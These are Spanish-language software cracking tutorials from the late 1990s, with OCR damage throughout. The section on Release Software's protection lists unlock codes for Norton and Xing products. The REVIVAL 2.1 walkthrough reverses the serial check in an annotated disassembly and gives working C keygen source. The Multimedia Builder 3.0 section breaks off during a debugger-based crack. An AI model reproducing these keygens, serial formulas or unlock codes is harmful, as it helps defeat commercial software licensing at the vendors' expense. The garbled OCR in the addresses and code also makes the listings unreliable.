"open"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,10,00,08,08,00,00,10,00,00,00,00,00,00,00,00,00,00,00 


¡Para los demás programas que usan esta protección tenemos: 


Xing MPEG Encoder códigoa MSHVEMAV 
Norton Utilities códigoa MSHVEM0E 

Norton Unisntaller códigoa MSHW2EHL 
Bueno ha sido largo pero ha merecido la pena. 


¡MORALEJA: Si quieres poner una puerta, procura que no sea de papel. 


Es el colmo de la incompetencia. Confías la venta de tu producto a un empresa que proporciona una protección ridícula que no vende tu producto si 
no que prácticamente lo regala. Por que no invertir la millonada que Symantec habrá pagado a Release Software Corporation encontrar a unos 
buenos programadores en ensamblador que hicieran una protección decente.Además, esta compañía protege y vende productos de más empresas a 
parte de Symantec. 

Basta pasarse por su web http://www.releasesoft.com y comprobar lo orgullosos que están de sus clientes. 

Realmente, no creo que esta compañía dure mucho. 


La importancia de este artículo radica en que se ha conseguido solventar con éxito la protección de una casa de Software dedicada a proteger y 
vender. Quedan a nuestros pies cientos de programas , con una protección de papel, gracias a la incompetencia de una avariciosa compañía. Mejor 
sería que diera los programas gratis, y de dejara de hacer el ridículo. 


Mr_PinK € WKT (WHISKEY KON TEKILA ) 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcino Ohotmail.com 
En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +ORC en la red. 


COMO CRAKEAR POR ESTADO+PORCINO| 
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INTRODUCCIÓN 


¡Saludos Familia! 


Aprovechando las vacas estivales me he decidido por escribir un bonito Generador de Llaves (en inglés KeyGen) para un útil programa de reparación de discos 


duros y disquetes. Como siempre un poco de Teoría para que podamos entendernos. 


Generadores de Llaves. 


La primera pregunta que responder es ¿qué carajo es un Generador de Llaves? Suponed por un instante que sois unos de esos programadores perezosos y cegados 
por el dinero que ha construido un programa protegido con un número de serie. Si alguien desea registrarse debemos pagar una cifra de dinero (pequeña o no) que 
hará engrosar nuestra cuenta. A cambio debemos de enviarle un número de serie que desbloquee el programa. ¿Hasta ahora todo correcto, verdad?. ¿Pero como 
demonios se genera un número de serie diferente para cada usuario? . La respuesta es: con un Generador de Llaves. 


Existen dos tipos de Generadores de Llaves: 


A- Dependientes de los datos del cliente. 
B- Independientes de los datos del cliente. 


El tipo A es el más extendido, el número de serie se genera a partir del nombre del cliente y el de su dirección de correo (por ejemplo). Así dos usuarios tendrán 
números de serie diferentes, por que en principio sus datos personales son diferentes. 


El tipo B está un poco en desuso, pero se siguen viendo por que son fáciles de programar (recordad que los programadores son por naturaleza vagos y sin 
imaginación). 

El mismo número de serie es válido para cualquier cliente. En estos casos, el programador da un número diferente a los clientes pardillos que compran su producto 
y reza para que no se lo den a nadie. 


¿Es posible crear un Generador de Llaves? 


El programa Generador de Llaves está normalmente en el ordenata del programador, entonces, ¿cómo demonios puede un cracker construir un Generador ?. La 
respuesta es sencilla pero difícil (en general) de realizar. 

El programa debe verificar que el número de serie que introducimos es válido y ésto sólo puede hacerlo verificando ciertas propiedades que debe cumplir el número 
de serie y que fueron establecidas por el Generador. 

¿Un poco lioso verdad?, dicho de otra forma, el Generador es un codificador de números de serie y en el programa sólo existe un decodificador que descifra el 
número de serie introducido. 


Vemos un sencillo ejemplo, suponed que nuestro Generador es el siguiente: 
NúmeroSerie=(89934*4)*(nombre(5)) 


Donde nombre(5) es la quinta letra del nombre del usuario. EL número 89934 es el llamado número mágico, un número que es de agrado del programador (quizás el 
número de veces que le ha su jefe le ha jodido) y que realmente es el corazón del Generador 


En el programa, para ver que el número de serie es correcto se debe de verificar: (NúmeroSerie/(4 /(nombre(5)) = 89934 
Como podéis apreciar, lo que hay en el programa es la inversa del Generador, por tanto si invertimos la inversa podemos obtener el Generador de Partida. 
No os engañéis, este es un Generador sencillo, lo normal es que esté ultra enrevesao , lleno de números mágicos y operaciones aritméticas exóticas. 


Normalmente, las rutinas de verificación realizan ciertas comprobaciones sobre la password de entrada. Generalmente pasan a mayúsculas y buscan ciertos 
caracteres en ciertas posiciones. En caso de no encontrarlos la password no es válida. Esto da pie a un truco mu útil pa localizar di una forma directa la rutina. Pero 
esto lo veremos más adelante. 


¿Pos mu bien, pero que necesito pa hacer un Generador de Llaves? 


1.- Lo primero es aislar el código del programa que verifica el número de serie. 
Además del código que las funciones que son llamadas desde la rutina de verificación (pa Saber que narices hacen). Normalmente las rutinas de verificación hacen 
uso de pequeñas rutinas: convertir a mayúsculas,convertir letras en números... 


2.- Un conocimiento exhaustivo, repito, exhaustivo del la rutina de verificación. 

Debemos saber TODO lo que hace y porqué lo hace. Recordad que tenemos que invertir su funcionamineto y esto no lo podemos hacer si no sabemos como funciona. 
Este es el punto más delicado y el que consume más tiempo. Dependiendo de las paranoias del programador podéis tardar horas o semanas. Se necesitan 
conocimientos de ensamblador y de operaciones aritméticas binarias 


|3.- Invertir el funcionamineto del Generador y crear con un compilador, por ejemplo de C nuestro propio Generador. 


¿Merece la pena hacer un Generador? 


La respuesta es depende. Hacer un Generador no es nada sencillo, consume mucho tiempo y habilidades. Es mucho más fácil parchear la rutina de verificación para 
que acepte cualquier cosa. 


Pero las ventajas de crear un Generador son muy importantes, primera y ante todo es que realmente se está cumpliendo con la filosofía crack (ingeniería inversa) al 
comprender y transformar el programa para que adapte a nuestras necesidades. 


Segúnda ventaja son los conocimientos que se captan sobre todo a nivel ensamblador y de operaciones aritméricas con bits. 
Tercera y no más importante la satisfacción del trabajo artesano, bien hecho. Esa satisfacción que nos hace seguir adelante. 


La cuarta ventaja tiene que ver con la historia del Software. Puedes "coleccionar" las protecciones de tu programa favorito y ver la evolución de su software. 


Y como quinta un fin práctico, al final del proceso se obtiene un número de serie válido, lo que te convierte en un usuario "'legal' y problamente no tengas que 
crakear la próxima versión. 


Generador de Llaves para REVIVAL 2.1 


Objetivo: REVIVAL 2.1 


Nombre: revive21.zip 

Tamaño: 874.644 bytes 

Versión: 2.1 

Site: http://uc2.unicall.be/revival/ 

Herramientas: SoftIce,W32dasm o IDA 3.75 y un compilador de C. 
Dificultad: No mu difícil. 

Tiempo: 5 horas. 


Este es un interesante programa que te permite recuperar ficheros borrados de discos duros y disquetes que soporta FAT32 y NTES. Tiene una típica ventana de 
registro a partir de la cual podemos acceder directamente a la rutina de verificación de la pass. Esta rutina es extremadamente sencilla e independiente de los datos 
del usuario, por eso ha sido la elegida como demostración. 


Aconsejo desensamblar con el IDA PRO 3.75(una pequeña maravilla de desensamblador). Se puede hacer con el W32dasm pero el IDA nos da más información y nos 
ahorra trabajo. Por ejemplo descubre de forma automática rutinas (_touper, isdigit...) que no son reconocidas como tales por el W32dasm. 


Bien, manos a la obra, desensamblemos con el IDA. 


¿Ya está? 

Bien, ahora sólo hay que localizar la rutina de verificación. Empleemos un viejo truco: el 80% de las rutinas de verificación intentan localizar el carácter '-' (2D en 
hexa) o el carácter '+' (2B en hexa). 

No me preguntéis por qué, pero lo hacen. Sólo hace falta buscar un 2Dh o un 2Bh y con un poco de suerte aterrizaremos en plena rutina de verificación. Debemos 
buscar una comprobación con 2Dh o bien 2Bh, pero como las comprobaciones pueden ser de muchos tipos , sólo buscaremos la parte final de la comprobación. 


Resumiendo, buscaremos ", 2Dh" y ", 2Bh". En caso de existir demasiadas ocurrencias, mejor decantarse por otro método de ataque. Al final es el olfato de cracker 
el que te indica si estás en la ocurrencia correcta o no. 

En este caso hay 20 ocurrencias de "2D" y 18 de ''2B". UFF, quizás demasiadas (de hecho es la primera ocurrencia de ''2D" la correcta), así que probemos un método 
más directo con el Softice. 


Metemos como nombre ESTADO, como campañía PORCINO y como número de serie estúpido por ejemplo 1212121212. CTRL+D y le damos al botón de OK y 
aparece una ventana de error. 


Esta ventana se parece a un messageboxexa (por su simplicidad y por el icono en forma de exclamación y por el único botón que aparece). Si repetimos el mismo 
proceso pero poniendo en el softice bppx messsageboxexa y pulsamos el botón de OK ... 

Bingo, aparecemos en la rutina de messageboxexa. Sólo hay que seguir la secuencia de llamadas hacia atrás buscando un salto que evite llamar a la ventana de 
mensaje de error. La secuencia de pasos es: 


* Paramos en bpx messageboxexa 


|* Pulsamos F12 para llegar a la rutina padre que llamó a messageboxexa. 


0040AA6C 
0040AA71 
0040AA74 
0040AA76 
0040AA78 
0040AA7F 
0040AA82 
0040AA83 
0040AA88 
0040AA8D 
0040AA90 
0040AA93 
0040AA94 
0040AA99 
0040AA9E 
0040AAA1 
0040AAA3 
0040AAAS 
0040AAA9 
0040AAAE 
0040AAB1 
0040AAB3 
0040AAB8 
0040AABA 
0040AABA 
0040AABA 
0040AABA 
0040AABC 
0040AABE 
0040AAC3 
0040AAC8 
0040AACA 
0040AACrF 
0040AACF 
0040AACF 
0040AAD1 
0040AAD3 
0040AAD8 
0040AAD9 
0040AADA 
0040AADB 
0040AADB 
0040AADB 
0040AADB 
0040AADB 
0040AADD 
0040AADF 
0040AAE4 
0040AAE9 
0040AAEA 
0040AAEB 
0040AAEB 


loc_40AABA: 


loc_40AACF: 


loc_40AADB: 


sub_40AA20 


[e Aparecemos en :4313CA pero por se ve ningún salto que evite la llamada a messageboxexa. 
* Pulsamos F12 para seguir subiendo hasta la rutina padre. 
* Aparecemos en :43145D. Pero de nuevo nada interesante. 
[* De nuevo F12 y .... 
* Aparecemos en :40CAAC8, esta si tiene lo que buscamos, exactamente. 


call sub_40CD10 ; RUTINA DE VERIFICACIÓN 
add esp, 4 

test eax, eax 

jz short loc_40AABA; SALTA SI ERES UN MAL CRACKER. 
mov dword ptr [esi+5Ch], 1 

mov eax, [esi+64h] 

push eax 

push offset aName;NOMBRE. 

Call sub_40AD70 

add esp, 8 

mov eax, [esi+60h] 

push eax 

push offset aCompany; COMPAÑÍA. 

Call sub_40AD70 

add esp, 8 

mov eax, [edi] 

push eax 

push offset aSerial;¡NÚMERO DE SERIE. 
Call sub_40AD70 

add esp, 8 

mov ecx, esi 

call sub_42550E 

jmp short loc_40AACF 


; CODE XREF: sub_40AA20+56_3 


push OFFFFFFFFh 


push 30h 
push OEF1Fh 


; DIRECCION DEL MENSAJE DE ERROR 
; VENTANA DE MESAJE DE ERROR 


Call sub_431413 
mov ecx, esi 
call sub_425527 


ecx, edi 


edi 
esi 


; CODE XREF: sub_40AA20+98_3 


OFFFFFFFFh 


sub_429A33 


; CODE XREF: sub_40AA20+25_3 
; sub_40AA20+40_3 


push OFFFFFFFFh 


push 30h 
push OEF1Eh 


Call sub_431413 
pop edi 

pop esi 

retn 

endp 


Fijaos en el salto en :40AA76. Si saltamos caemos en la ventana de mensaje y evitamos acceder a NOMBRE,COMPAÑÍA y NÚMERO DE SERIE. El salto está 

controlado por :40AA6C call sub_40CD10 .Que interesante, una rutina que controla la ventana de mensaje de error, ¿a qué nos suena ésto?. BINGO, estamos ante la 
rutina de verificación. 
Échemósle un vistazo y comentémosla. 


¡Desensamblado con el IDA ;p(0) indica el carácter 0 de la password. Recordad, empiezo a contar los caracteres desde 0. 


0040CD10 
0040CD10 
0040CD10 
0040CD10 
0040CD10 
[0040CD10 
10040CD10 
l0040CD10 
[DO4OCD1O 


sub_40CD10 


var_24 
var_20 
var_1E 
var_1B 
arg_0 


proc near 


= byte ptr -24h ; 
= word ptr -20h ; 
byte ptr -1Eh ; 
byte ptr -1Bh ; 
= dword ptr 4: 6; 


; CODE XREF: sub_4046004+98_p 
; sub_40AA20+4C_p 


variable local. 
variable local. 
variable local. 
variable local. 
Argumento de la función que no es más que la dirección de nuestra password. 


UNA 


l0040CD10 sub esp, 24h; Ajusta la pila para reservar espacio para las varibles locales. 
/0040CD13 push ebx; Guarda algunos registros. 
l0040CD14 push esi 
[0040CD15 mov esi, [esp+2Ch+arg_0] ; esi= dirección de nuestra password. 
[0040CD19 push edi 
0040CD1A movsx eax, byte ptr [esi] ; eax=p(0) 
0040CD1D push eax 
0040CD1E call _toupper ; Pasamos a mayúsculas p(0). 
0040CD23 add esp, 4 
0040CD26 cmp eax, 52h ; ¿ES P(0) = R? 
0040CD29 jnz loc_40CE7F ; Salta a flag de error si p(0) no es R. 
0040CD2F movsx eax, byte ptr [esi+1] ; eax=p (1) 
0040CD33 push eax 
0040CD34 call _toupper ; Pasamos a mayúsculas p(1). 
0040CD39 add esp, 4 
0040CD3C cmp eax, 56h ; ¿ES P(1) = V? 
0040CD3F jnz loc_40CE7F ; Salta a flag de error si p(1) no es V. 
0040CD45 cmp byte ptr [esi+7], 2Dh ; ¿ES P(7) = '-'? 
0040CD49 jnz loc_40CE7F ; Salta a flag de error si p(7) no es '-'. 
0040CD4F push esi 
0040CD50 Call ds:1lstrlenaA ; Calcula el tamaño de la password. 
0040CD56 cmp eax, OFh ; ¿Es el tamaño 15? 
0040CD59 jnz loc_40CE7F ; Salta a flag de error si el tamaño no es 15 
0040CD5F mov edi, 2 ; Segundo carácter. 
0040CD64 
0040CD64 loc_40CD64: ; CODE XREF: sub_40CD10+6D_3 
¡Bucle para comprobar que son números p(2)...p(6) 
0040CD64 movsx eax, byte ptr [edi+esil]; eax=p (2) 
0040CD68 push eax 
0040CD69 Call _isdigit ; ¿es un número p(2)? 
0040CD6E add esp, 4 
0040CD71 test eax, eax 
0040CD73 jz loc_40CE64 ; Salta con flag de error si p(2) no es número. 
0040CD79 inc edi ; Apuntamos al siguiente carácter. 
0040CD7A cmp edi, 7 ; ¿Hemos llegado a p(7)? 
0040CD7D 31 short loc_40CD64 ; Salta si no hemos llegado a p(7). 
0040CD7F mov edi, 8 ; Octavo carácter. 
¡Bucle para comprobar que son números p(8)...p(14) 
0040CD84 
0040CD84 loc_40CD84: ; CODE XREF: sub_40CD10+8D_3 
0040CD84 movsx eax, byte ptr [edi+esil;; eax=p(8) 
0040CD88 push eax 
0040CD89 Call _isdigit ;¿es un número p(8)? 
0040CD8E add esp, 4 
0040CD91 test eax, eax 
0040CD93 3jz loc_40CE6D ; Salta con flag de error si p(8) no es número. 
0040CD99 inc edi ; Apuntamos al siguiente carácter. 
0040CD9A cmp edi, OFh ; ¿Hemos llegado a p(15)? 
0040CD9D 31 short loc_40CD84; Salta si no hemos llegado a p(15). 
0040CD9F mov ax, [esi+2] ; ax=p(2)p(3) 
0040CDA3 mov [esp+30h+var_20], ax 
0040CDA8 lea eax, [esp+30h+var_20] 
0040CDAC mov [esp+30h+var_1E], 0 
0040CDB1 push eax 
0040CDB2 Call _atoi ¡Pasa p(2)p(3) a número. 
0040CDB7 mov cx, [esi+5] ¡¿cx=p (5)p(6) 
0040CDBB add esp, 4 
0040CDBE mov [esp+30h+var_20], cx 
0040CDC3 sub al, 13h ; al=p(2)p(3)-19 
0040CDC5 lea ecx, [esp+30h+var_20] 
0040CDC9 mov [esp+30h+var_24], al 
0040CDCD mov [esp+30h+var_1E], 0 
0040CDD2 push ecx 
0040CDD3 Call _atoi ¡Pasa p(5)p(6) a número. 
0040CDD8 lea edx, [esp+34h+var_20]; 
0040CDDC add esp, 4 
0040CDDF lea ebx, [eax-25h] ¿ebx=p (5)p (6) -37 
0040CDE2 lea ecx, [esi+0Ah] ¡ecx=dirección de p(10) 
0040CDE5 push edx 
0040CDE6 mov eax, [ecx] ¿ebx=p (10)p (11)p (12) p (13) 
0040CDE8 mov [edx], eax 
0040CDEA mov cl, [ecx+4] ¿cl=p (14) 
0040CDED mov [edx+4], cl 
0040CDFO mov [esp+34h+var_1B], 0 
0040CDF5 Call _atoi ¡Pasa p(10)p(11)p(12)p(13)p(14) a número. 
0040CDFA add esp, 4 
| 0040CDFD mov edi, eax 
[0040CDFF xor di, 5468h ¿di=p(10)p(11)p(12)p(13)p (14) XOR 21508 
l0040CE04 mov ax, [esi+8] ¡ax=p (8)p(9) 


| 
|0040CE08 mov [esp+30h+var_20], ax 


l0040CEO0D lea eax, [esp+30h+var_20] 

¡0040CE11 mov [esp+30h+var_1E], O 

l0040CE16 movzx edi, di 

[0040CE19 push eax 

[0040CE1A Call _atoi ¡Pasa p(8)p(9) a número. 

0040CE1F mov byte ptr [esp+34h+var_20], al 

0040CE23 add esp, 4 

0040CE26 xor eax, eax 

0040CE28 mov ecx, 64h 

0040CE2D mov al, bl ¡al=p (5)p (6) -37 

0040CE2F mov ebx, 0Ah 

0040CE34 lea eax, [eax+edi+3]; eax'=(p(5)p (6) -37)+(p(10)p (11)p (12)p (13)p (14) XOR 21508) + 3 
0040CE38 cdg 

0040CE39 idiv ecx ¡Divide eax'/100 

0040CE3B mov el, dl ¡¿cl=resto (eax'/100) 

0040CE3D xor eax, eax 

0040CE3F mov al, [esp+30h+var_24] 

0040CE43 lea eax, [eax+edi+3]; eax=(p(2)p(3)-19)+(p(10)p(11)p(12)p(13)p(14) XOR 21508) + 3 
0040CE47 cdg 

0040CE48 idiv ebx ¡Divide eax/10 

0040CE4A sub dl, [esi+4] ¡dl=resto (eax/10)-p (4) 

0040CE4D cmp dl, 0ODOh ;¿Es resto(eax/10) = p(4)? 

0040CE50 jnz short loc_40CE76;Salta a flag de error si resto(eax/10) no es p(4) 
0040CE52 cmp byte ptr [esp+30h+var_20], cl;¿Es resto(eax'/100) = p(8)p(9)? 
0040CE56 jnz short loc_40CE76;Salta a flag de error si resto(eax'/100) no es p(4) 
0040CE58 mov eax, 1 ; Ok todo correcto. Flag de éxito activado. 
0040CE5D pop edi 

0040CE5E pop esi 

0040CE5F pop ebx 

0040CE60 add esp, 24h 

0040CE63 

0040CE64 ; 

0040CE64 

0040CE64 loc_40CE64: ; CODE XREF: sub_40CD10+63_3 

0040CE64 xor eax, eax ; Eres un mal chico.Flag de error activado. 
0040CE66 pop edi 

0040CE67 pop esi 

0040CE68 pop ebx 

0040CE69 add esp, 24h 

0040CE6C 

0040CE6D ; 

0040CE6D 

0040CE6D loc_40CE6D: ; CODE XREF: sub_40CD10+83_3 

0040CE6D xor eax, eax ; Eres un mal chico.Flag de error activado. 
0040CE6F pop edi 

0040CE70 pop esi 

0040CE71 pop ebx 

0040CE72 add esp, 24h 

0040CE75 

0040CE76 ; 


Antes de seguir adelante, centremonos en un par de puntos: 


- ¿Habéis descubierto los números mágicos?, sip los hay son 5468h, OAh y 64h. 

- Como es tradición la rutina checkea en este caso la presencia del carácter '-'. 

Luego con un poco de paciencia, nuestra búsqueda inicial hubiera tenido sus frutos. 

- Habéis notado la pésima calidad del código. Uso innecesario de variables, instrucciones inútiles, tamaño del código exagerado. Todo esto es debido a que se 
programó en alto nivel, seguramente en C. 

¿Cómo quieren los programadores proteger su software si es de pésima calidad?. Están directamente vendidos (salvo honrosas excepciones, por supuesto.) 

- Si andais un poco pegaos de operacones aritméticas y de ensamblador, buscad alguno 

de los fabulosos cursos de ensamblador que hay en la Web. 


Resumamos los momentos más interesantes de la rutina de verificación: 


A) 0040CD26 cmp eax, 52h ; ¿ES P(0) = R? 

B) 0040CD3C cmp eax, 56h ; ¿ES P(1) = V? 

C)0040CD45 cmp byte ptr [esi+7], 2Dh ; ¿ES P(7) = '-'? 

D)0040CD56 cmp eax, 0OFh ; ¿Es el tamaño 15? 

E) 0040CD64 ¡Bucle para comprobar que son números p(2)...p(6) 

F) 0040CD84 ¡Bucle para comprobar que son números p(8)...p(14) 

G) 0040CDC3 sub al, 13h ; al=p(2)p(3)-19 

H) 0040CDDF lea ebx, [eax-25h] ; ebx=p(5)p(6)-37 

TI) 0040CE34 lea eax, [eax+edi+3] ; eax'=(p(5)p(6)-37)+(p(10)p (11)p (12)p (13)p (14) 
XOR 21508) + 3 

J)0040CE3B mov el, dl ; cl=resto(eax'/100) 

¡[K) 0040CE43 lea eax, [eax+edi+3] ; eax=(p(2)p(3)-19)+(p(10)p(11)p (12)p (13)p (14) 

| XOR 21508) + 3 

[L) 0040CE4D cmp dl, ODOh ;¿Es resto(eax/10) = p(4)? 


M0: 0046GE52 cmp byte ptr [esp+30h+var_20], cl;¿Es resto(eax'/100) = p(8)p(9)?. 


Por A),B),C),D),E) y F) sabemos que la password debe de tener este aspecto: 


00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 
RVX X XX X X —= X X X X X X X Xx 


Donde x es un número del 0 al 9. 


Despues hay dos bonitas ecuaciones: 


Por H),1),J) y M) 
I) p(8)p(9)=resto( (p(5)p(6)-0x25)+(p(10)p(11)p(12)p(13)p(14) XOR 21508) + 3) / 0x64) 


Por G),K),L) 
II) p(4)=resto ( (p(2)p (3)-0x13)+(p(10)p(11)p (12)p(13)p(14) XOR 21508) + 3) / Ox0A) 


Pos ya está. Estas son las ecuaciones de la rutina de verificación, ya se puede implementar nuestro propio Generador de Llaves, que no será más que implementar 
estas dos ecuaciones. 

Estas dos ecuaciones comprueban que la parte derecha sea igual a la parte izquierda (p(S)p(9) y p(4)). Nuestro Generador calculara la parte derecha y construirá la 
parte izquierda de forma adecuada. Se podrían simplificar un poco, pero no lo haré pa no complicar el asunto. 


Un posible Generador en C sería algo así como: 


VER CODIGO FUENTE DEL GENERADOR 


Utilizo números aleatorios (random) para generar un número de serie diferente cada vez que se ejecute e programa. Una última curiosidad, donde creereis que guarda nuestra 
pass el programa. Si lanzais el La utilidad regmon (analiza todos los accesos al Registro dels Sistema) con el programa, podréis apreciar que se accede a 
"HKEY_LOCAL_MACHINESSOFTWARERevivallRevival2.0 Serial" Poco imaginativo, ¿verdad?. Podéis modificar este número para evitar registraos y probad Con nuevas 
pass. 


Notas para los lectores. 


1.- Los mensajes del tipo "Hazme el crack para ....'', "Dime como de crackea....'*, "Dime donde puedo encontrar...'' son automáticamente ignorados. El objetivo de 
estos artículos es enseñar a crackear no enseñar a ser unos llorones ineptos que sólo saben mendigar. 


2.- Sólo responderé a preguntas teóricas sobre cracks, indicando algunas pistas que faciliten la labor. 


3.- Narices, escribid artículos sobre los programas que crackeeis. 
De nada sirve lo que aprendéis si no lo repartís, se os pudre en el cabeza, palabra. 


4.- Lamento no haber contestado a ciertos mails interesantes. Desde aquí mis excusas. 
5.- Si os ha servido para algo mis artículos, no seáis vagos y mandad un mail indicándomelo. 
Mr.PinK 8 WKT (WHISKEY KON TEKILA ) 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcino E hotmail.com 


En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +ORC en la red. 


$ 
Vi 


[ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


----CORTAR POR AQUÍ------o------- 
ttinclude <conio.h> 
ttinclude <stdlib.h> 
ttinclude <stdio.h> 
ttinclude <string.h> 


NI / 


void main (void) 


( 
ttdefine TAM_CADENA 15 


char password[TAM_CADENA+]1 ],temporal[10],1; 
char p2_p3=0,p4,p5_p6=0,p8_p9; 
unsigned long p10_p14; 


clrscr(); 


randomize(); 
print£("9s",'Wn Generador de Llaves para el programa REVIVAL 2.1 .n Por Estado+Porcino."); 


for(i=0;¡<TAM_CADENA;++i) 
password[i]="0"; 
password[i]="0'; 


password[0]='R'; 
password[ 1]="V"; 
password[7]="-"; 


while (p2_p3<0x13) 
p2_p3=((random(9+1)*10)+random(9)+1; 


while (p5_p6<0x25) 
p5_p6=((random(9+1)*10)+random(9)+1; 


p10_p14=( ((random(9+1)*10000)+ ((random(9)+1)*1000)+ ((random(9)+1)*100)+ ((random(9)+1)*10)+ random(9)+1); 


p4=((p2_p3-0x13)+(p10_p14"0x5468)+3)%0x0A; 
p8_p9=((p5_p6-0x25)+(p10_p14"0x5468)+3)%0x64; 


strncpy(£(password[2]),itoa(p2_p3,temporal, 10),2); 
strncpy(S£(password[4]),itoa(p4,temporal,10),1); 
strncpy(£(password[5]),itoa(p5_p6,temporal,10),2); 
strncpy(£(password[S]),itoa(p8_p9,temporal, 10),2); 
strncpy(£(password[10]),ultoa(p10_p14,temporal, 10),5); 


print£(inin Su password es: "); 
printf (password); 


) 
----CORTAR POR AQUÍ--------------- 


COMO CRAKEAR POR ESTADO+PORCINO 


CAPITULO V. COLOR CRACK 


-Como Crackear Multimedia Builder 3.0- 


Noviembre 1998 


Indice 
INTRODUCCIÓN 


UN PRIMER VISTAZO 


PRIMER OSTIAZO 


ZEN CRACK 
CRACK EN COLORES 


CONCLUSIÓN 


INTRODUCCIÓN 


Victima: Multimedia Builder 3.0 
Site: www.mediachance.com 
Herramienta: Nuestro amado Sice y Zen crack. 


Hoy es un día de Heineiken,Café de de Kenya,Moskovkaya,Guiness, Mahon y mujeres. 
Bueno, ya estamos de vuelta con un nuevo truco bajo el brazo: ''Crack en Color" que lo aplicaremos a nuestro conejillo de indias, 


el excelente Multimedia Builder. Un programa para crear aplicacniones que incluyen sonido, imagen,video. Se programa al 
estilovisual de VB . No os perdais el reproductor de CD que viene con el ejemplo. 


UN PRIMER VISTAZO 


Realmente este programador se lo ha currado. Ha cerrado la mayoría de las puertas de entrada a los crackers, por tanto hay que 
abrir otras como el ''Crack en Color". Veamos alguno de sus ingenios del autor: 


- Existe un número de serie que se introduce desde ''HelplAboufMRegister'' 


- Cuando introducimos un número de serie falso no aparece ninguna ventana de error. 
Por lo que queda descartado el clásico ''bpx messageboxexa". 


- Las cadenas de caracteres importantes las tiene encriptadas, por lo que no podemos buscarlas con el ''Search and Replace", lo 
que impide un crack en 5 minutos. 


PRIMER OSTIAZO 


Desechados los ataques típicos, vamos a entrar por la puerta clásica siguiendo la pista del Serial falso. 


Metemos un número basura ''12121212", Saltamos al sice y ponemos 's 30:00 1 f££f£fff "12121212" 

En cada ocurrecia XX:xx aplicamos 'bpr XX:xx XX:xx+8 rw'. Una vez acabado damos al botón de OK y BOOM, aparecemos en el 
sice. Unos F12 llegamos a la rutina ''GetwindowTextA". 

Dejamos esta línea de trabajo porque es muy aburrida. 


Al final conseguimos aislar una rutina en que devuelve ( si estamos registrados y 1 en otro caso.Podemos falsearla para 
registrarnos. Y de hecho lo ''conseguimos"'. Nuestro nombre aparece en la ventana de registro. Pero hay una sorpresita. Si 
ejecutamos Project/Run aparece '"'unregistered...''. ¿Cómo es posible? 


¡Pero SI estamos registrados!. La cosa es aún peor, si nos peleamos con el registro y generamos un número de serie válido las cosas 
no mejorar. ¿Que está pasando aquí? 


ZEN CRACK 


Si hemos pasado el algoritmo de registro satisfactoriamente, ¿porqué seguimos sin estar registrados?. 
Razonemos, la única forma de no estar registrados es que no pasemos alguna verificación. Sabemos que hemos pasado una, luego 
debe de haber otra verifiación en otra parte del código. 


Este programador ha pensado un poco. HA SEPARADO LAS COMPROBACIONES del serial. 
Y lo que es todavía más interesante, en cada comprobación analiza cosas diferentes. Así, si se pasa completamente una 
comprobación no se garantiza que se pase el resto. 


Sabemos ya que por lo menos hay dos comprobaciones (una que pasamos y otra no). 

Debe existir un nexo de unión entre las comprobaciones: Una variable que guarde el serial que hemos introducido. Pero aquín las 
variantes son múltiples :la primera comprobación puede encriptar el serial para la segunda, modificar un flag para que siempre 
resulte falsa la segunda comprobación... 


La pregunta que se plantea es ¿Cómo localizo la segunda comprobación?. 

La única pista es el horrible letrero amarillo ".. unregistered ..''. Se podrían analizar todas las variables que modifica el primer 
algoritmo , pero eso es demasiado costoso. Debemos buscar otra forma. 

La única forma de saber que no hemos pasado las comprobaciones es el letrero amarillo. Es por ahí por donde debemos atacar. 


El mensaje está encriptado ,luego desechamos esa vía. 
El letrero parece un Label al estilo de de JAVA o Delphi, por lo que no tiene entidad propia como una ventana. 
¿Por donde atacamos? 


CRACK EN COLORES 


Centremonos, ¿qué es lo que má llama la atención del letrero? , su color amarillo. 

Este color debe de asignarse de alguna forma. Además el amarillo parece que es el color de fondo del letreo. Si desensamblamos a 
nuestro objetivo vemos que utiliza la función setbkcolor. 

Así pues debemos localizar algo parecido a 'setbkcolor(Amarillo)''.Pero como se expresa exactamente el color amarillo. 


Normalmente los colores se forman a partir de la combinación de los llamados "colores básicos” . 

Lo normal es usar como colores básicos RGB="Rojo Verde y Azul.' Nuestro problema es como expresar el amarillo del letrero en 
función de RGB. Por suerte nuestro amarillo es una simple combinación. Podemos utilizar la paleta de colores de cualquier 
programa para comprobarlo. En mi caso he usado el Visual Café 2.5 (crackeado por supuesto). 

Introduciendo Rojo=255,Verde=255,Azul=0 obtenemos el mismo amarillo que el del letrero. 


Si el color hubiera sido más complejo,capturamos la pantalla con el letrero y la importamos a un editor gráfico como el 
Photoshop.Seleccionamos un pixel del color amarillo del letreo y vemos sus componentes en términos de Rojo, Verde y Azul. 
Es posible que exita un program que realize esta función más sencilla. Si lo encontris, por favor notificádmelo. 


Asi pues debemos de localizar algo asi como "setbkcolor(255 255 0)". Necesitamos conocer si existen más parámetros para el 
¡setbkcolor. Mirando el API tenemos: 


COLORREF SetBkColor(HDC hdc, // handle of device context 
COLORREF crColor // background color value 


); 
The COLORREF value is a 32-bit value used to specify an RGB color. 
When specifying an explicit RGB color, the COLORREF value has the following hexadecimal form: 
Ox00bbggrr 


Nuestro color es un entero y se pasa como segundo parámetro. Dado que los número se almacenan al revés debemos buscar 
SetBkColor(hdc,0000ffff). Desempolvemos los manuales del Sice, por lo que nos queda 


bpx setbkcolor if (*(esp+8)==ffff0000) 


Expliquemos un poco el churro que ha aparecido. bpx setbkcolor indica que se pare cuando se ejecute la rutina setbkcolor Se para 
cuando (*(esp+8)==00ffff), es decir, cuando el contenido del registro EIP+8 sea O0ffff. Recordemos que los parámteros a las 
funciones se pasan a través de la pila (ESP=registro stack pointer): 


Concretamente es ESP+8 porque en se apilan dos palabra de 4 bytes cada uno. 


Antes de la llamada ESP=000 
Llamada ESP=Dirección de retorno. (palabra de 4 bytes) 
ESP+4=parámetro HDC. (palabra de 4 bytes) 
ESP+8=segundo parámetro 


Aplicando nuestro bpx y pulsando ''Proyect/Run'' BOOM, aparecemos en el sice, para ver si estamos realmente ante el setbkcolor 
